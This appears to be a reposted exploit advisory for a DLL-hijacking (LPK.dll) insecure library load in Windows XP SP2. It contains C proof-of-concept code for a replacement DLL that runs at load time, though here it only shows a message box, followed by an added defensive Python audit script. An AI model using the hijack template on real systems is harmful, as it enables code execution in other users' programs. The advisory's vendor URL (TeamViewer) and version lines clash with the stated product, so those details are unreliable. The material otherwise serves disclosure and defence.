[+] Site            : 1337day.com
[+] Support e-mail  : submit[at]1337day.com

I'm The Black Devils member from Inj3ct0r Team

Author Word : This was written for educational purposes. Use it at your own risk.
Author will not be responsible for any damage.

1. ADVISORY INFORMATION
-----------------------
Product: Microsoft Windows XP Professionnel Service Pack 2&3 Insecure Library Load
Vendor URL: http://www.teamviewer.com/fr/index.aspx
Date found: 2013-02-26
Date published: 2013-02-26

2. CREDITS
----------
This vulnerability was discovered and researched by The Black Devils

3. VERSIONS AFFECTED
--------------------
Microsoft Windows XP Professionnel Service Pack 2, older versions may be affected too.

4. VULNERABILITY DESCRIPTION
----------------------------
An insecure library loading vulnerability has been identified in Microsoft
Windows XP Professionnel Service Pack 2.

The application uses a fixed path to look for specific files or libraries.
This path includes directories that may be untrusted or under user control.

By placing a custom version of a library in the application path, the program
will load it before the legitimate version. This allows an attacker to inject
custom code that will be run with the privileges of the program or of the user
executing the program.

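The following libraries could be hijacked in this way:

LPK.dll

5. PROOF-OF-CONCEPT (CODE / Exploit)
------------------------------------
// wine gcc -Wall -shared inject.c -o LPK.dll

#include <windows.h>

/* DLL entry point: the loader calls it when the library is mapped into a process. */
BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    /* Runs once, at load time, in the context of the loading program. */
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        /* Harmless marker: a message box shows that this copy was loaded. */
        MessageBox(0, "Inj3ctor", "The Black Devils", 0);
    }

    return TRUE;
}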
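
Added example (not part of the original advisory and not the author's code): a defensive audit in Python that walks an application directory and reports every DLL whose name also exists in the system directory, the condition section 4 describes as being loaded before the legitimate version. The directory layout, the file names other than LPK.dll, and the file contents are constructed placeholders.

```python
import hashlib
import os
import tempfile

def sha256(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def index_dlls(directory):
    """Map lower-cased DLL name -> path (Windows file names are case-insensitive)."""
    found = {}
    for name in os.listdir(directory):
        full = os.path.join(directory, name)
        if name.lower().endswith(".dll") and os.path.isfile(full):
            found[name.lower()] = full
    return found

def find_shadowing_dlls(app_root, system_dir):
    """Report DLLs under app_root that share a name with a DLL in system_dir."""
    system = index_dlls(system_dir)
    findings = []
    for dirpath, _dirs, _files in os.walk(app_root):
        for name, path in sorted(index_dlls(dirpath).items()):
            if name in system:
                # A differing hash means the local copy is not the system file.
                same = sha256(path) == sha256(system[name])
                findings.append((name, path, same))
    return findings

def write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)

def demo():
    # Constructed sample tree with placeholder bytes, not real libraries.
    with tempfile.TemporaryDirectory() as root:
        system_dir = os.path.join(root, "system32")
        app_root = os.path.join(root, "app")
        write(os.path.join(system_dir, "lpk.dll"), b"system lpk")
        write(os.path.join(system_dir, "example.dll"), b"shared bytes")
        write(os.path.join(app_root, "LPK.dll"), b"different bytes")
        write(os.path.join(app_root, "plugins", "example.dll"), b"shared bytes")
        write(os.path.join(app_root, "plugins", "helper.dll"), b"app only")
        return [(n, os.path.relpath(p, root).replace(os.sep, "/"), same)
                for n, p, same in find_shadowing_dlls(app_root, system_dir)]

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

A copy that is byte-identical to the system file is still reported, because it would continue to be loaded in place of the system copy after the system copy is updated.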